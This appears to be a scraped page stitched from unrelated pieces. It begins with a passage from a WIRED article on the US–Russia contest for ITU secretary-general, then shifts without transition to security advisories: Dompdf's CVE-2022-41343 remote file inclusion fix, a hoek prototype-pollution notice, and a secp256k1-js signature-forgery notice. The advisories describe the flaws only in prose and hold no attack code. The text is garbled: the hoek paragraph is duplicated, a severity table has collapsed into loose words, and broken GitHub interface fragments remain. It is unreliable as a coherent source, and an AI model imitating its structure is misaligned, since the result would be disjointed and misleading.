In February, the United States appointed Ambassador Erica Barks-Ruggles as their representative responsible for the ITU conference—with marching orders to get Bogdan-Martin elected. She appeared before a House foreign affairs subcommittee late last year to underscore the fact that the United States’ focus on the ITU election, amongst others, meant “countering the efforts of countries such as the People’s Republic of China and Russia to reshape and undermine international law, institutions, and standards.” President Joe Biden has also released a statement endorsing Bogdan-Martin.

“What we’re really hearing from countries around the world,” the official says, is that connecting the roughly 3 billion people on the planet with no access to the internet is a top priority—closing the so-called digital divide. “We learned during Covid the stark digital divide that’s out there, and they want it closed as soon as possible,” the official said.

On that, they said, Bogdan-Martin “is focused like a laser.”

Ismailov, meanwhile, is trying to turn the race into a referendum on America.

“You can clearly see the two camps humankind is divided into: developing countries and the West,” he says in his campaign video. He set up the United States, and the West more broadly, as a monopolistic entity with respect to the internet.

“They encouraged extremist resources on their platforms at the same time they eradicated anyone who goes against their agenda,” Ismailov adds, citing Donald Trump’s Twitter ban as a prime example. In the friendly interview, Ismailov was asked about Russian media, such as RT, being taken offline in the United States and Europe. Ismailov likened it to “cancel culture.”

Ismailov drew a stark comparison: The Soviet Union’s development of nuclear weapons, followed by China, “offset everyone’s ambitions and made the perception of risk very tangible.” There had not been the same nuclear arms race in the telecommunications space, he says.

It’s a message that could just work, but the Americans are paying it no mind. “He’s focusing on a very negative vision, moaning about things,” the official says of Ismailov. “Let him do that.”

The State Department official spoke on background, and the department declined to make Bogdan-Martin available for an interview. A request to the Russian mission in Geneva, where the ITU is located, went unanswered.

While there was some quiet optimism about Bodgan-Martin’s chances, none of the experts and delegates to the ITU who spoke with WIRED were willing to predict her victory. Even though Russia has lost a number of major votes at the UN in recent months, the race for secretary-general is—unlike many other votes at the international body—a secret ballot, leaving room for horse-trading.

Some of Russia’s appeal is macro: The Beijing and Russia compact is undoubtedly attractive to less democratic countries that want to be free to regulate and restrict the internet as they see fit. Ismailov might also be attractive for other reasons. Earlier this year, Russian satellite operator Intersputnik announced that the country would be sponsoring a 200-seat cafeteria at the ITU’s new Geneva headquarters.

The top-tier race isn’t the only one that matters, however. At their annual meeting later this month, the ITU members will also select a number of senior functionaries, elect the make-up of regulatory boards, and choose a new council. All of those races have the potential to determine the way the ITU approaches these core questions over the next four years.

The secretary-general race will, however, signal what direction the organization is headed. Göran Marby, CEO of Icann—a core administrator of the technical infrastructure of the internet—would not officially endorse Bodgan-Martin, but he told the organization’s annual meeting last week that voting for Ismailov would mean “people around the world might not be able to connect to one single interoperable internet.”

Marby said he was remaining neutral, but added: “We vividly oppose one of the platforms, that the Russian potential secretary-general stands for.”

In an email statement, a spokesperson for Marby told WIRED that Ismailov’s candidacy threatens to further centralize control within the ITU, taking those authorities away from stakeholder groups like Icann.

“Technically, this is not possible,” they wrote. “The internet operates based on a system of voluntary standards, best practices, cooperation, and trust.” This cooperative model, they added, “is a model that works. The internet has operated without fail for nearly 40 years.”

While reiterating their neutrality in the race, the spokesperson added that “if the functions of Icann were moved to the ITU, the risk of internet fragmentation would be very real, and the interoperability of the internet would be jeopardized.”

This Vote Could Change the Course of Internet History

registerFont in FontMetrics.php in Dompdf before 2.0.1 allows remote file inclusion because a URI validation failure does not halt font registration, as demonstrated by a @font-face rule.

**Change highlights since 2.0.0**

*   Improved font-face declaration parsing and handling
*   Improved layout of images with percentage-based dimensions

_**This release addresses the following vulnerabilities:**_

Vulnerability

References

Type

Severity

Remote file inclusion

#2994

Information Disclosure

TBD

**2.0.x highlights**

*   Modifies callback and page\_script/page\_text handling
*   Switches the HTML5 parser to Masterminds/HTML5
*   Improves CSS property parsing and representation
*   Switches installed fonts and font metrics cache file format to JSON

The list of addressed issues can be found in the 2.0.1 release milestone. View all changes since the previous release in the commit history.

We would like to extend our gratitude to the community members who helped make this release possible.

**Requirements**

Dompdf 2.0.1 requires the following:

*   PHP 7.1 or greater
*   html5-php v2.0.0 or greater
*   php-font-lib v0.5.4 or greater
*   php-svg-lib v0.3.3 or greater

Note that some dependencies may have further dependencies (notably php-svg-lib requires sabberworm/php-css-parser).

Additionally, the following are recommended for optimal use:

*   GD (for image processing)

For full requirements and recommendations see the requirements page on the wiki.

**Download Instructions**

The dompdf team recommends that you use Composer for easier dependency management.

If you're not yet using Composer you can download a packaged release of dompdf which includes all the files you need to use the library. Click the link labeled "dompdf\_2-0-1.zip" for the packaged release. The download options labeled "Source code" are auto-generated by github and do not include all the dependencies.

CVE-2022-41343: Release Dompdf 2.0.1 · dompdf/dompdf

hoek versions prior to 8.5.1, and 9.x prior to 9.0.3 are vulnerable to prototype pollution in the clone function. If an object with the __proto__ key is passed to clone() the key is converted to a prototype. This issue has been patched in version 9.0.3, and backported to 8.5.1. 

hoek versions prior to 8.5.1, and 9.x prior to 9.0.3 are vulnerable to prototype pollution in the clone function. If an object with the **proto** key is passed to clone() the key is converted to a prototype. This issue has been patched in version 9.0.3, and backported to 8.5.1.

**References**

*   https://nvd.nist.gov/vuln/detail/CVE-2020-36604
*   hapijs/hoek#352

GHSA-c429-5p7v-vgjp: hoek subject to prototype pollution via the clone function.

The secp256k1-js package before 1.1.0 for Node.js implements ECDSA without required r and s validation, leading to signature forgery.

**secp256k1-js implements ECDSA without required r and s validation, leading to signature forgery**

Moderate severity GitHub Reviewed Published Sep 25, 2022 • Updated Sep 27, 2022

GHSA-q3f4-9h4p-vgr3: secp256k1-js implements ECDSA without required r and s validation, leading to signature forgery

Permalink

**Comparing changes**

Choose two branches to see what’s changed or to start a new pull request. If you need to, you can also .

**Open a pull request**

Create a new pull request by comparing changes across two branches. If you need to, you can also .

_base repository:_ lionello/secp256k1-js _base:_ 1.0.1

_head repository:_ lionello/secp256k1-js _compare:_ 1.1.0

*   13 commits
*   8 files changed
*   4 contributors

**Commits on Jun 18, 2019**

**Commits on Feb 18, 2020**

**Commits on Mar 8, 2021**

**Commits on Apr 29, 2021**

**Commits on Sep 23, 2022**

**Commits on Sep 24, 2022**

Tag

#js